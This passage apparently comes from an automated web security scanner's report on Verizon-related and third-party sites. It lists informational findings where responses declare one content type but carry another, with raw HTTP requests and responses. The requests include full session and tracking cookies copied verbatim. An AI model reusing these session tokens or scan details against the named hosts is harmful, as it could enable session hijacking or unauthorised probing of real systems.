Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 485
Last-Modified: Wed, 29 Apr 2009 21:02:12 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: image/gif
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

26.40. http://headlines.verizon.com/headlines/resources/images/tstories/tStoriesControl_right.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/tstories/tStoriesControl_right.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /headlines/resources/images/tstories/tStoriesControl_right.gif HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 635
Last-Modified: Wed, 29 Apr 2009 21:02:12 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: image/gif
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

26.41. http://headlines.verizon.com/headlines/resources/images/tstories/tStoriesControl_rightOn.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/tstories/tStoriesControl_rightOn.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /headlines/resources/images/tstories/tStoriesControl_rightOn.gif HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381; CP=null*; VISITORID=1597650297

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 967
Last-Modified: Wed, 29 Apr 2009 21:02:12 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: image/gif
Date: Mon, 05 Sep 2011 22:42:57 GMT
Connection: close

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

26.42. http://headlines.verizon.com/headlines/resources/images/twit_pipe.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/twit_pipe.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /headlines/resources/images/twit_pipe.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Thu, 09 Sep 2010 00:10:28 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 318
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR.............l..'....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....
.0.E.R.d....c.!X..<nG1 ...o......[R`G\N...I....w.........*R.+x(......H.FH.z...q.I.5PDQ...bt.G...5p
...[SNIP]...

26.43. http://headlines.verizon.com/headlines/resources/images/verizonEmail.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/verizonEmail.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /headlines/resources/images/verizonEmail.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Thu, 09 Sep 2010 00:10:08 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 868
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...`.........?.......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Y=..@...D...D......cJ..?..!.\D....(I..E..D../..D.@Jq.%~.........4.7.'q.;...._..ff...i.N...k....@@.@@
...[SNIP]...

26.44. http://maps.google.com/maps/api/js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.google.com
Path:   /maps/api/js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /maps/api/js HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Language
Date: Mon, 05 Sep 2011 22:35:30 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

alert("The Google Maps API server rejected your request. The \x22sensor\x22 parameter specified in the request must be set to either \x22true\x22 or \x22false\x22.")

26.45. http://s.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Firm
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /meta?_o=15772&_t=ghp&ssv_random=27&ssv_callback=SetXP1Placements&ssv_003=&ssv_004=&ssv_005=&ssv_006=&ssv_007=&ssv_008=&ssv_009=&ssv_010=&ssv_011=&ssv_012=0&ssv_013=0&ssv_014=807&ssv_015=&ssv_016= HTTP/1.1
Host: s.xp1.ru4.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Cookie: X1ID=BO-00000000521444319; O1807966=768; P1807966=c3N2X2MzfFl8MTMxMjc2OTY3N3xzc3ZfYnxjM3wxMzEyNzY5Njc3fHNzdl8xfDI4NTQ0NTM5OHwxMzEyNzY5Njc3fA==; M62795-97956=1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:14:30 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1621610-B22941263=0|0|0|0|0|22946267|22946266|-1; domain=.ru4.com; path=/
Set-cookie: P15772=; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Content-type: text/html
Content-length: 1487
X-Cnection: close

SetXP1Placements({
"xp1_placement1": {
"creativeID": "GHP_OT_HSIDL3M_DEF",
"clickURL": "http://s.xp1.ru4.com/click?_o=15772&_n=62795&_c=1621610&_x=17344902&_b=17344904&_d=0
...[SNIP]...

26.46. http://sales.liveperson.net/hcp/html/mTag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=44153975 HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/promotion/specialoffers.jsp
Cookie: LivePersonID=LP i=546022977410,d=1312768968

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=44153975
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1ce6"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:15:21 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

26.47. http://sales.liveperson.net/visitor/addons/deploy.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /visitor/addons/deploy.asp HTTP/1.1
Host: sales.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 05 Sep 2011 22:35:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 424
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQQTCTSA=HLKAPFHCLMLFMHDAOAJLLEPA; path=/
Cache-control: private

//Plugins for site
<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=2>Invalid Path Character(s)</font>

...[SNIP]...

26.48. https://seal.verisign.com/getseal

Summary

Severity:   Information
Confidence:   Firm
Host:   https://seal.verisign.com
Path:   /getseal

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /getseal HTTP/1.1
Host: seal.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, must-revalidate
ETag:
Content-Type: text/javascript
Date: Mon, 05 Sep 2011 22:35:39 GMT
Connection: close

<!-- x=1; -->

26.49. https://secure.opinionlab.com/rate36_json.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /rate36_json.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /rate36_json.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Cool01: Opinionlab - Cool01
Date: Mon, 05 Sep 2011 22:35:43 GMT
Connection: close

invalid call method

26.50. https://secure.opinionlab.com/rate36s.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.opinionlab.com
Path:   /rate36s.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /rate36s.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Cool01: Opinionlab - Cool01
Date: Mon, 05 Sep 2011 22:35:43 GMT
Connection: close

invalid call method

26.51. http://sr2.liveperson.net/hcp/html/mTag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sr2.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=2329305 HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=2329305
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:27d6"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 17291
Date: Mon, 05 Sep 2011 22:16:46 GMT
Connection: close

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

26.52. http://syndicate.verizon.com/ads/js.ashx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://syndicate.verizon.com
Path:   /ads/js.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /ads/js.ashx?page=shopvz.net/homepage&pos=Right,Right1&hbx=Right,Right1 HTTP/1.1
Host: syndicate.verizon.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; vsrecentsearches=wss~xss~xss%20sq~~; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 3073
Date: Mon, 05 Sep 2011 22:21:44 GMT
Connection: close

//Copyright (c) 2000-2003 by 24/7 Real Media, Inc. ALL RIGHTS RESERVED. 3/13/2008
//New changes made on 06/25 and pushed to fuat on 06/25
//configuration
OAS_url = 'http://oascentral.verizononline
...[SNIP]...

26.53. http://syndicate.verizon.net/ads/js.ashx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://syndicate.verizon.net
Path:   /ads/js.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ads/js.ashx?page=business2.vz.net/out/homepage&pos=Top1,x13 HTTP/1.1
Host: syndicate.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 2698
Date: Mon, 05 Sep 2011 22:35:53 GMT
Connection: close

//Copyright (c) 2000-2003 by 24/7 Real Media, Inc. ALL RIGHTS RESERVED. 3/13/2008
//New changes made on 06/25 and pushed to fuat on 06/25
//configuration
OAS_url = 'http://oascentral.verizononline
...[SNIP]...

26.54. http://syndicate.verizon.net/ads/scripthandler.ashx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://syndicate.verizon.net
Path:   /ads/scripthandler.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ads/scripthandler.ashx?source=business2.vz.net/out/homepage HTTP/1.1
Host: syndicate.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 1140
Date: Mon, 05 Sep 2011 22:36:02 GMT
Connection: close

// using application id: business2.vz.net
// using page id: out/homepage


           var vz_included_elements = new Array();    // remember everything we've added to the DOM
                                                   // this will redefine
...[SNIP]...

26.55. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

Summary

Severity:   Information
Confidence:   Firm
Host:   http://verizonwireless.tt.omtrdc.net
Path:   /m2/verizonwireless/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

